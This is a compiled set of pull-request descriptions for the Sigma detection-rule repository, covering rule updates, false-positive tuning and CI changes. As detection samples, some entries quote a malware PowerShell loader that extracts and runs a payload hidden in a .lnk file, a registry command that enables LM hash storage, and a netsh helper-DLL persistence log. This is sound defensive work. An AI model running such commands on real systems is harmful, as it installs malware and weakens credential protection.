rules-emerging-threats/2021/Exploits/CVE-2021-1675/av_printernightmare_cve_2021_34527.yml, rules-emerging-threats/2022/Exploits/CVE-2022-41120/proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml, rules/category/antivirus/av_relevant_files.yml, rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml, rules/windows/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml, rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml, rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml
This PR updates and fixes some rules
fix: Suspicious Sysmon as Execution Parent - Typo and restructure
update: Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection
update: Antivirus Relevant File Paths Alerts
update: Dump Ntds.dit To Suspicious Location
update: MSI Installation From Suspicious Locations
update: PowerShell Profile Modification - Reduce rule level to medium
update: Obfuscated IP Download Activity
N/A
N/A
=> Fixes & Updates

rules/windows/image_load/image_load_thor_unsigned_execution.yml
This PR adds a new rule for unsigned thor scanner execution
new: Suspicious Unsigned Thor Scanner Execution
N/A
N/A
=> Unsigned Thor Execution

rules/cloud/aws/cloudtrail/aws_disable_bucket_versioning.yml
This detection alerts when a threat actor disable AWS S3 bucket versioning. This tactic prohibits victims from restoring any impacted S3 objects and is a common technique used in real world AWS S3 ransomware and extortion incidents. 
new: AWS S3 Bucket Versioning Disable
```json
{
"eventVersion": "1.09",
"userIdentity": {
"type": "IAMUser",
"principalId": "AIDA[REDACTED]",
"arn": "arn:aws:iam::[REDACTED]:user/Admin",
"accountId": "[REDACTED]",
"accessKeyId": "[REDACTED]",
"userName": "Admin",
"sessionContext": {
"attributes": {
"creationDate": "2023-10-27T13:59:36Z",
"mfaAuthenticated": "true"
}
}
},
"eventTime": "2023-10-27T14:01:46Z",
"eventSource": "[s3.amazonaws.com](https://urldefense.proofpoint.com/v2/url?u=http-3A__s3.amazonaws.com&d=DwMFaQ&c=V9IgWpI5PvzTw83UyHGVSoW3Uc1MFWe5J8PTfkrz …
```
=> Add `AWS S3 Bucket Versioning Disable` Rule

rules-emerging-threats/2023/Exploits/CVE-2023-43261/proxy_cve_2023_43261_milesight_information_disclosure.yml, rules-emerging-threats/2023/Exploits/CVE-2023-43261/web_cve_2023_43261_milesight_information_disclosure.yml
Fix a couple small title typos
* Potential Information Discolosure CVE-2023-43261 Exploitation - Proxy -> Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy
* Potential Information Discolosure CVE-2023-43261 Exploitation - Web -> Potential Information Disclosure CVE-2023-43261 Exploitation - Web
n/a
n/a
=> fix some title typos

.github/ISSUE_TEMPLATE/false_positive_report.yml, .github/ISSUE_TEMPLATE/rule_proposal.md, tests/reference-archiver.py
N/A
chore: update archiver script and issues template
N/A
N/A
=> chore: update archiver script and issues template

.github/workflows/sigma-test.yml, rules/windows/builtin/ldap/win_ldap_recon.yml, rules/windows/network_connection/net_connection_win_google_api_non_browser_access.yml, rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml, tests/logsource.json, tests/sigma_cli_conf.yml
Add Sigma-cli config file
chore: add sigma-cli configuration file
fix: Suspicious Non-Browser Network Communication With Google API - Fix escaped wildcard issue and Update modifiers
fix: Uncommon PowerShell Hosts - Fix escaped wildcard issue
fix: Potential Active Directory Reconnaissance/Enumeration Via LDAP - Update logsource
=> Add Sigma-cli config file

.github/workflows/sigma-test.yml, tests/sigma_cli_conf.yml, tests/test_rules.py
- Remove duplicate tests from test_rules.py
- Activate `--fail-on-issues`
As now the workflow can fail on issue, missing issue:
- dangling_detection 
- them_condition_with_single_detection 
- specific_instead_of_generic_logsource
- title_length
- invalid_modifier_combinations
- attacktag
- tlptag
- tlpv1_tag
- tlpv2_tag
- control_character 
- double_wildcard
- escaped_wildcard 
- number_as_string
- wildcards_instead_of_modifiers
chore: workflow - remove duplicate test
=> Chore: remove duplicate tests

.github/workflows/release.yml
This PR removes the date from the release file filenames as suggested in #4499
chore: remove date tag from the release filename
N/A
Fixed #4499
=> chore: remove date tag from the release filename

rules-threat-hunting/windows/file/file_event/file_event_win_susp_binary_dropper.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_powershell_import_module.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_susp_file_permission_modifications.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_taskkill_execution.yml
This PR fixes some FPs found in testing
fix: Creation of an Executable by an Executable
fix: Import New Module Via PowerShell CommandLine
fix: File or Folder Permissions Modifications
fix: Process Terminated Via Taskkill
N/A
N/A
=> fix: false positives found in testing

.github/workflows/release.yml, tests/sigma-package-release.py
chore: use less strict merge messages
chore: add version.txt to release packages
chore: generate release as draft to enable manual reviewing
=> chore: updates to release packages

README.md
Add [alterix](https://github.com/mtnmunuklu/alterix) to Projects or Products that use Sigma Rules
=> Add alterix to Projects or Products that use Sigma Rules

rules/windows/builtin/security/win_security_ad_user_enumeration.yml
AD User Enumeration tuning proposal. In our environment, some attributes are written at each user login which triggers this rule. Adding a filter on the accessmask (on read access https://learn.microsoft.com/fr-fr/windows/security/threat-protection/auditing/event-4662) made it work properly
update: Potential AD User Enumeration From Non-Machine Account - Apply additional filters to only look for Access Masks with "READ PROPERTY" values
For example we have logs for "Request access" on an attribute that are triggering the rule. Adding the restriction to the mask solves this.
N/A
=> Add mask filter to match only read access on AD attributes

rules/windows/registry/registry_event/registry_event_office_test_regadd.yml
added contains
Fix the TargetObject Condition
=> fix the TargetObject Condition

.github/workflows/greetings.yml
Fix an issue with the greetings workflow
chore: update greetings workflow
N/A
N/A
=> chore: update greetings workflow

README.md
chore: update README with link to the Confluent Sigma repo.
chore: update README with link to the Confluent Sigma repo.
N/A
N/A
=> updated link to Confluent in README

rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml
It seems like the rule is expected to match a **literal question mark(not as wildcard)**, so I added an escape.
fix: Execute Code with Pester.bat - Fix a non escaped wildcard `?`
N/A
N/A
=> update: add escape for literal question mark

rules/web/proxy_generic/proxy_ua_apt.yml
Pull Reqest adds user agent associated with PlugX backdoor.
update: APT User Agent - adding user agent associated with PlugX backdoor.
N/A
N/A
=> Add PlugX backdoor UA to proxy_ua_apt.yml

.github/workflows/sigma-test.yml, .gitmodules, tests/sigma_cli_conf.yml, tests/test_rules.py
Move more tests to sigma-cli 
Cleanup the code
chore: Add attacktag and tlptag to pySigma tests
=> chore: move more tests to pySigma

rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml
The position of the modifier `all` in the following rule seems to be incorrect, so I fixed it.
(Sorry if I misunderstood the intent of the rules.)
**Actual rule**
https://github.com/SigmaHQ/sigma/blob/d57787276151060be4e329f8a76eb7dad6e6bd1f/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml#L76-L79
**Expected rule**
```yml
filter_main_winsxs:
CommandLine|contains|all:
- ':\Windows\WinSxS\'
- '\UpdateDeploy.dll /ClassId '
```
fix: Potentially Suspicious Wuauclt Network Connection
n/a
n/a
=> fix: value modifier `|all` position for `Potentially Suspicious Wuauclt Network Connection` rule

tests/sigma_cli_conf.yml, tests/test_rules.py
Add new validators from sigma-cli 0.7.10
chore: Add new validators from sigma-cli 0.7.10 and remove obsolete tests in test_rules.py
=> ci: 🤖 add new sigma-cli 0.7.10 validators

rules/web/proxy_generic/proxy_ua_apt.yml, rules/windows/registry/registry_set/registry_set_disable_function_user.yml
Adding two registry value `NoDispCPL` and `NoDispBackground` based on Malwarebytes detections
update: Disable Internal Tools or Feature in Registry - Increase coverage by adding 2 new values, namely `NoDispCPL` and `NoDispBackground`
N/A
N/A
=> Adding two registry modifications detections to registry_set_disable_function_user.yml

.github/PULL_REQUEST_TEMPLATE.md, .github/workflows/release.yml, .github/workflows/sigma-test.yml, rules/windows/process_creation/proc_creation_win_rundll32_executable_invalid_extension.yml
chore: run sigma rule repo tests only on specific paths
chore: add manual thanks and list removed rules in changelog
fix: Rundll32 Execution Without DLL File - remove command line restriction bc of numerous FPs
=> Remove in changlog, additional attribution, workflow optimization, FP tuning

.github/workflows/goodlog-tests.yml, .github/workflows/sigma-test.yml, .github/workflows/sigma-validation.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_susp_file_permission_modifications.yml, tests/check-baseline-local.sh
chore: update evtx-baseline to v0.8
chore: add file paths that impact the test
chore: split goodlog and QA tests into two separate workflows
fix: File or Folder Permissions Modifications - FPs with partial paths
=> chore: update evtx-baseline to v0.8

.github/workflows/greetings.yml
This PR removes the action "first-interaction" due to a currently unsolved upstream error
See https://github.com/actions/first-interaction/issues/286
chore: temporarily disable greetings
N/A
N/A
=> chore: temporarily disable greetings

.github/workflows/greetings.yml, rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml
This PR updates a rule for COR CLR profiler persistence as achieved through the registry. The current rule accounts for the .NET Framework abuse. The updated rule accounts for the addition of the open-source .NET profiler abuse 
update: Enabling COR Profiler Environment Variables - Add additional values to increase coverage for potential COR CLR profiler abuse
N/A
N/A
=> updating cor profiler rule

rules/windows/image_load/image_load_wmi_module_load_by_uncommon_process.yml
Fixed some strings in filter section.
fix: WMI Module Loaded By Non Uncommon Process - Fix typo in the rule filter
N/A
N/A
=> fix: correct the filter strings

rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml, rules/windows/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml, rules/windows/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml
This PR updates the Netsh DLL Helper rules
update: Potential Persistence Via Netsh Helper DLL - Reduced severity and enhance metadata information
new: New Netsh Helper DLL Registered From A Suspicious Location
new: Potential Persistence Via Netsh Helper DLL - Registry
```xml
<EventData>
<Data Name="RuleName">-</Data> 
<Data Name="EventType">SetValue</Data> 
<Data Name="UtcTime">2023-11-28 14:35:39.346</Data> 
<Data Name="ProcessGuid">{351a8cc0-fc23-6565-ddf4-060000002500}</Data> 
<Data Name="ProcessId">17928</Data> 
<Data Name="Image">C:\Windows\system32\netsh.exe</Data> 
<Data Name="TargetObject">HKLM\SOFTWARE\Microsoft\NetSh\malicious</Data> 
<Data Name="Details">malicious.dll</Data> 
<Data Name="User">test\test</Data> 
</EventData>
```
- Closes and replaces #4547 due to commit and …
=> Update Netsh Helper DLL Rules

.github/workflows/greetings.yml
Revert greetings workflow
chore: revert greetings workflow and update to 1.3.0
N/A
N/A
=> chore: revert greetings workflow

.github/workflows/ref-archiver.yml, .github/workflows/sigma-rule-promoter.yml
Update automated workflow to create PRs to use different branch names to avoid override during execution.
chore: use different branch to avoid override
N/A
N/A
=> chore: use different branch to avoid override

tests/sigma_cli_conf.yml, tests/test_rules.py
Add more pySigma Validators to CI
chore: Add more pySigma Validator
=> Add more pySigma tests to CI

rules/windows/process_creation/proc_creation_win_cmd_unusual_parent.yml
Fixed the typo in the process name
=> Fixed the typo in process name

rules/web/proxy_generic/proxy_ua_malware.yml, rules/windows/process_creation/proc_creation_win_powershell_decrypt_pattern.yml
N/A
update: PowerShell Execution With Potential Decryption Capabilities
update: Malware User Agent
```powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w h -c $mine=$env:localappdata;$ion=$mine+'\net.zip';cd $mine;$rotate=Get-ChildItem -r *.lnk|where-object {$_.length -gt 1650000}|Select-Object -ExpandProperty FullName;$past=[system.io.file]::ReadAllBytes($rotate);[System.IO.File]::WriteAllBytes($ion, $past[($past.length-1689419)..($past.length)]);cd $mine;Expand-Archive $ion . -EA 0 -Force|Out-Null;Remove-Item $ion -EA 0 -Force|Out-Null;cd Microsoft.NET;& '.\BMO-Code-of-Conduct.pdf';& '.\WsatConfig.exe'
```
```powershell
B..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-w h -c "$mine=$env:localappdata;$ion=$mine+'\net.zip';cd …
```
=> feat: updates for multiple rules 4-12-2023

rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml
fix: Suspicious SYSTEM User Process Creation - filter both program file folders for FP with Java
=> fix: filter both program file folders

rules-threat-hunting/windows/process_access/proc_access_win_lsass_susp_source_process.yml
add new webex binary
fix: title: LSASS Access From Program In Potentially Suspicious Folder - Filter out Webex binary 
=> add new webex binary

rules-emerging-threats/2023/TA/Cozy-Bear/image_load_apt_cozy_bear_graphical_proton_dlls.yml, rules-emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml, rules-emerging-threats/2023/TA/Cozy-Bear/win_taskscheduler_apt_cozy_bear_graphical_proton_task_names.yml, rules-threat-hunting/windows/powershell/powershell_script/posh_ps_compress_archive_usage.yml, rules/windows/image_load/image_load_side_load_from_non_system_location.yml, rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml, rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml, rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml, rules/windows/process_creation/proc_creation_win_nltest_recon.yml, rules/windows/process_creation/proc_creation_win_powershell_zip_compress.yml, rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml, rules/windows/process_creation/proc_creation_win_reg_nolmhash.yml, rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml, rules/windows/process_creation/proc_creation_win_reg_volsnap_disable.yml, rules/windows/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml, rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml, rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml, rules/windows/registry/registry_set/registry_set_system_lsa_nolmhash.yml
This PR updates and add new rules related to CISA `aa23-347a` advisory
new: DLL Names Used By SVR For GraphicalProton Backdoor
new: Enable LM Hash Storage
new: Enable LM Hash Storage - ProcCreation
new: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor
new: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler
update: Compress-Archive Cmdlet Execution - Reudced Level to `low` and moved to Threat Hunting folder.
update: Disabled Volume Snapshots - Update logic by removing the `reg` string to also account for potential renamed executions
update: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet - Update logic to be more specific
update: Potential Recon Activity Via Nltest.EXE - Add `dnsgetdc` coverage and enhance logic by …
=> feat: add rules related to CISA `aa23-347a` advisory

rules/windows/process_creation/proc_creation_win_reg_desktop_background.yml, rules/windows/process_creation/proc_creation_win_reg_desktop_background_change.yml, rules/windows/registry/registry_set/registry_set_desktop_background_change.yml, tests/sigma_cli_conf.yml
This new rule detects replacing a user's desktop background by altering existing registry keys via reg.exe. This was recently reported in November as a TTP for Rhysida's ransomware campaign (see references).  This should not trigger many false positives, as users will typically not change their background with reg.exe.
new: Potentially Suspicious Desktop Background Change Using Reg.EXE
new: Potentially Suspicious Desktop Background Change Via Registry
Example for Windows Audit logs, EventCode 4688. A pySigma pipeline can rename `NewProcessName` to `Image`
```xml
<Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'>
<System>
<Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/>
<EventID>4688</EventID>
<Version>2</Version> …
```
=> New: Suspicious Desktop Background Change Using Reg.exe

rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml
~~auther was meant to check if any of selection_anomaly_1 and all of selection_anomaly_2.~~
~~because selection_anomaly_1 contains all appdata and temp paths that should have any condition, not all.~~
This PR fixes an error in `all` modifier usage in `selection_anomaly`
fix: Suspicious Command Patterns In Scheduled Task Creation - Fix error in modifier usage
N/A
N/A
=> fix: updated the wrong condition of all

rules-threat-hunting/windows/file/file_access/file_access_win_susp_gpo_access_uncommon_process.yml, rules/windows/file/file_access/file_access_win_susp_gpo_access.yml, rules/windows/file/file_access/file_access_win_susp_gpo_access_file.yml
Add rules to detect uncommon application reading the sysvol Policies share folder
new: Access To Sysvol Policies Share By Uncommon Process
new: Access To Potentially Sensitive Sysvol Files By Uncommon Application
```bash
Nov  2 10:16:54 Win11 AURORA: Notice MODULE: Sigma MESSAGE: Sigma match found RULE_TITLE: Access To Sysvol Policies Share By Uncommon Application RULE_AUTHOR: frack113 RULE_DESCRIPTION: Detects file access requests to the Windows Sysvol Policies Share. RULE_FALSEPOSITIVES: Unknown RULE_ID: 8344c19f-a023-45ff-ad63-a01c5396aea0 RULE_LEVEL: medium RULE_MODIFIED: 2023/11/02 RULE_PATH: sigma-rules\file_access_win_susp_gpo_access.yml RULE_REFERENCES: https://github.com/vletoux/pingcastle RULE_SIGTYPE: custom COMMANDLINE: "\"C:\\temp\\PingCastle_3.1.0.1\\PingCastle.exe\" …
```
=> Add Sysvol Policies Access rules

rules/windows/process_creation/proc_creation_win_reg_nolmhash.yml
This small PR fixes the rule `Enable LM Hash Storage - ProcCreation`. In the rule, the trailing slash in the registry path causes the rule to not match true positive events.  
In the CISA advisory listed in the references, the CommandLine IOC is given as follows, with no trailing slash after Lsa: `reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d "0" /f`
Removing the trailing slash from the path fixes the detection, and true positives will match.
fix: Enable LM Hash Storage - ProcCreation - Removed trailing slash from registry path
From the CISA advisory: 
`CommandLine = reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d "0" /f` …
=> Fix: Enable LM Hash Storage - ProcCreation

rules/windows/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml
=> fix: missing commandline condition

rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml
This PR reduces the level of the rule `Remote PowerShell Session (PS Classic)` to low
update: Remote PowerShell Session (PS Classic) - Reduce level to `low`
N/A
N/A
=> Reduce `Remote PowerShell Session (PS Classic)` Level

rules/windows/process_creation/proc_creation_win_susp_eventlog_content_recon.yml
This PR fixes a typo in the image name of the rule.
fix: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities - Fix typo in WMIC image name
N/A
N/A
=> fix: updated the wrong image name

rules/windows/process_creation/proc_creation_win_rar_susp_greedy_compression.yml
This PR fixes a typo in the path selection of the rules
fix: Suspicious Greedy Compression Using Rar.EXE - Fix error in path selection
N/A
N/A
=> fix: hardcoded removal of c: should be replace with ?:

rules/windows/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml, rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml, rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml
This PR adds the following CommandLine strings to various rules that detect disabling Windows Defender Features:
1, DisableCatchupFullScan
2. DisableCatchupQuickScan
3. DisableArchiveScanning
4. MAPSReporting
update: Tamper Windows Defender - ScriptBlockLogging - Add additional PowerShell MpPreference Cmdlets
update: Tamper Windows Defender - PSClassic - Add additional PowerShell MpPreference Cmdlets
update: Powershell Defender Disable Scan Feature - Add additional PowerShell MpPreference Cmdlets
N/A
N/A
=> Update: Disable Windows Defender Features Addition

rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml
chore: update broken link in `NetNTLM Downgrade Attack - Registry`
fix: broken link in NetNTLM Downgrade Attack rule
=> docs: broken link

rules-threat-hunting/windows/process_creation/proc_creation_win_mode_codepage_change.yml, rules/windows/process_creation/proc_creation_win_codepage_mode.yml, rules/windows/process_creation/proc_creation_win_mode_codepage_russian.yml
New: CodePage modification via MODE to Russian language
This rule was created because I've identified the use of mode.com in-the-wild by Dharma ransomware and other malware. 
In the case of Dharma ransomware, they try to change the CodePage of the operating system to `1251` which is `ANSI Cyrillic; Cyrillic (Windows)`. For other samples I've observed the CodePage `866` related to `OEM Russian; Cyrillic (DOS)`. 
new: CodePage Modification Via MODE.COM
new: CodePage Modification Via MODE.COM To Russian Language
See the next piece of Sysmon Event
```xml
-
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"> - <System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>1</EventID>
<Version>5</Version> …
```
=> New: CodePage modification via MODE to Russian language

deprecated/windows/image_load_susp_uncommon_image_load.yml, rules/windows/image_load/image_load_susp_unsigned_dll.yml, rules/windows/image_load/image_load_unsigned_dll.yaml
New rule that detects RunDLL32/RegSvr32 loading an unsigned/untrusted dll.
new: Unsigned DLL Loaded by RunDLL32/RegSvr32
N/A
N/A
=> Suspicious unsigned DLL Loaded by RunDLL32/RegSvr32

README.md
Added AttackIQ to the 'Projects and Products' section of the README
chore: Update README
=> Added AttackIQ to README Projects and Products

rules-emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml
Increase coverage of rule by adding more processes.
update: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process - Increase coverage
N/A
N/A
=> update: added missing image names

rules-threat-hunting/windows/builtin/firewall_as/win_firewall_as_change_rule.yml, rules-threat-hunting/windows/create_remote_thread/create_remote_thread_win_loadlibrary.yml, rules/windows/builtin/firewall_as/win_firewall_as_add_rule.yml, rules/windows/builtin/firewall_as/win_firewall_as_add_rule_susp_folder.yml, rules/windows/builtin/firewall_as/win_firewall_as_delete_all_rules.yml, rules/windows/create_remote_thread/create_remote_thread_win_mstsc_susp_location.yml, rules/windows/create_remote_thread/create_remote_thread_win_powershell_susp_targets.yml, rules/windows/create_remote_thread/create_remote_thread_win_susp_password_dumper_lsass.yml, rules/windows/create_remote_thread/create_remote_thread_win_susp_relevant_source_image.yml, rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_source_image.yml, rules/windows/create_remote_thread/create_remote_thread_win_susp_uncommon_target_image.yml, rules/windows/create_remote_thread/create_remote_thread_win_uncommon_source_image.yml, rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml, rules/windows/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml, rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml
FP fixes for multiple rules
fix: Firewall Rule Modified In The Windows Firewall Exception List - new optional filter Brave browser
update: CreateRemoteThread API and LoadLibrary - Reduce level to `medium` and convert to a TH rule
fix: Uncommon New Firewall Rule Added In Windows Firewall Exception List - Fix the filters to be more generic
update: New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application - Add additional paths to increase coverage
update: All Rules Have Been Deleted From The Windows Firewall Configuration - Remove `program files` filter to increase coverage. As deleting rules shouldn't be a "normal" behavior.
fix: Remote Thread Creation In Mstsc.Exe From Suspicious Location - Fix a broken path string
update: Powershell Install a DLL in …
=> fix: several FPs

rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml
condition says **selection** and **selection2** but **selection** string is already present in **selection2** parts.
so, **selection** part was unnecessary. that's why i removed it.
chore: PowerShell ShellCode - Remove "selection" as it was overlapping with "selection2"
N/A
N/A
=> update: removed unnecessary selection part

.github/workflows/sigma-rule-promoter.yml, tests/promote_rules_status.py
Upgrade promote_rules_status.py to pySigma
chore: workflow - update  promote_rules_status to pySigma
N/A
=> Upgrade promote_rules_status to pySigma

rules/windows/network_connection/net_connection_win_dead_drop_resolvers.yml
update: Potential Dead Drop Resolvers - Add `abuse.ch`
https://app.any.run/tasks/4a2ca271-3861-467b-8756-84a29d8b20a7/
=> feat: update Potential Dead Drop Resolvers rule

rules/windows/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml
Allow extension in quotes in "Rundll32 Execution With Uncommon DLL Extension"
update: Rundll32 Execution With Uncommon DLL Extension - Update the selection to allow for additional quoted cases such as `rundll32 "shell32.dll",ShellExec_RunDLL <somethin>`
NOTE: not sure if this is just a specific thing of ours
=> Fix some FP in Rundll32 Execution With Uncommon DLL Extension

rules/windows/process_creation/proc_creation_win_hxtsr_masquerading.yml
I noticed false positives with Aurora and couldn't find the "CurrentDirectory" field in the events. I don't know why that rule used that field instead of the "Image" field. 
fix: Potential Fake Instance Of Hxtsr.EXE Executed - Use Image field in filter
I see the following FPs with Aurora::
Event Info
Image	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21806.0_x64__8wekyb3d8bbwe\HxTsr.exe
CommandLine	"C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21806.0_x64__8wekyb3d8bbwe\HxTsr.exe" -ServerName:Hx.IPC.Server
Computer	XXX
Correlation_ActivityID	
EventID	4688
EventRecordID	119548605
Execution_ProcessID	4
Execution_ThreadID	14860
Keywords	0
Level	0
MandatoryLabel	S-1-16-4096
Module	Sigma
NewProcessId	7396
Opcode	0
ParentImage …
=> fix: filter in hxtsr rule

rules/windows/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml
Image condition in filter was missing
Added the missing image condition
fix: Outbound RDP Connections Over Non-Standard Tools - Add missing field name
=> fix: added the missing image condition

rules/web/proxy_generic/proxy_ua_apt.yml
This PR adds new user agent related to downloader used by RedCurl APT
update: APT User Agent - Add UA used by RedCurl APT
N/A
N/A
=> Added user agent related to downloader used by RedCurl APT

rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/file_event_win_apt_unknown_exploitation_indicators.yml, rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml, rules/windows/process_creation/proc_creation_win_powershell_download_susp_file_sharing_domains.yml, rules/windows/process_creation/proc_creation_win_powershell_iex_patterns.yml, rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml, rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly_2.yml, rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_child_proc.yml, rules/windows/process_creation/proc_creation_win_remote_access_tools_simple_help.yml, rules/windows/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml, rules/windows/process_creation/proc_creation_win_susp_add_user_privileged_group.yml, rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml, rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml, rules/windows/process_creation/proc_creation_win_wget_download_direct_ip.yml, rules/windows/process_creation/proc_creation_win_wget_download_susp_locations.yml
This PR introduces some updates and rules related to Slash&Grab ScreenConnect exploitation
new: Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE
new: Remote Access Tool - ScreenConnect Backstage Mode Anomaly 2
new: Remote Access Tool - ScreenConnect Remote Execution
new: Remote Access Tool - Simple Help Execution
new: ScreenConnect - SlashAndGrab Exploitation Indicators
new: Suspicious File Download From IP Via Wget.EXE - Paths
new: User Added To Highly Privileged Group
update: Suspicious PowerShell IEX Execution Patterns - Enhance coverage by adding new "IEX" variant
update: Weak or Abused Passwords In CLI - Add additional password seen abused in the wild
N/A
N/A …
=> Slash&Grab Exploitation Related Updates

deprecated/windows/proc_creation_win_rundll32_js_runhtmlapplication.yml, deprecated/windows/proc_creation_win_rundll32_script_run.yml, rules/windows/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml, rules/windows/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml
~~Modification of the detection logic to include the double comma attack:~~
~~https://packetstormsecurity.com/files/177084/Windows-Defender-Detection-Mitigation-Bypass.html~~
This PR deprecates similar rules that cover potential abuse of RunHtmlApplication export and increase coverage of `4782eb5a-a513-4523-a0ac-f3082b26ac5c` to account for usage of the export with ID.
~~Moved `RunHTMLApplication` to a new line in the `CommandLine|contains|all:` clause allowing for the double (or maybe even a triple!) comma attack to be detected.~~
update: Mshtml.DLL RunHTMLApplication Suspicious Usage - Merge overlapping rules and enhance logic to account for new reported bypass
remove: Rundll32 JS RunHTMLApplication Pattern
remove: Suspicious Rundll32 Script in CommandLine
See references
N/A
- If your …
=> Update Rules Related To `RunHTMLApplication` Abuse

rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml, rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_script.yml, rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup.yml, rules/windows/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml, rules/windows/process_creation/proc_creation_win_cmd_del_execution.yml, rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml, rules/windows/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml, rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml
Many binaries accepts both type of arguments that startswith '/' and '-'. so i updated some rules that contains augments with '/' as prefix to check for '-' prefix as well.
update: Suspicious Service Installation Script - Increase coverage by adding for the "/" option in commands flags
update: Console CodePage Lookup Via CHCP - Increase coverage by adding for the "/" option in commands flags
update: Curl Download And Execute Combination - Increase coverage by adding for the "/" option in commands flags
update: File Deletion Via Del - Increase coverage by adding for the "/" option in commands flags
update: Files And Subdirectories Listing Using Dir - Increase coverage by adding for the "/" option in commands flags
update: Suspicious Ping/Copy Command Combination - Increase coverage by …
=> Update Multiple Rules to cover the '-' arguments along with '/' arguments

deprecated/windows/proc_creation_win_wuauclt_execution.yml, rules-emerging-threats/2018/TA/APT29-CozyBear/file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml, rules-emerging-threats/2018/TA/APT29-CozyBear/proc_creation_win_apt_apt29_phishing_campaign_indicators.yml, rules-emerging-threats/2021/Malware/Devil-Bait/proc_creation_win_malware_devil_bait_output_redirect.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_diskshadow_child_process.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_diskshadow_script_mode.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_iexpress_execution.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml, rules-threat-hunting/windows/process_creation/proc_creation_win_rundll32_dllregisterserver.yml, rules/windows/builtin/application/msiinstaller/win_msi_install_from_web.yml, rules/windows/file/file_event/file_event_win_sed_file_creation.yml, 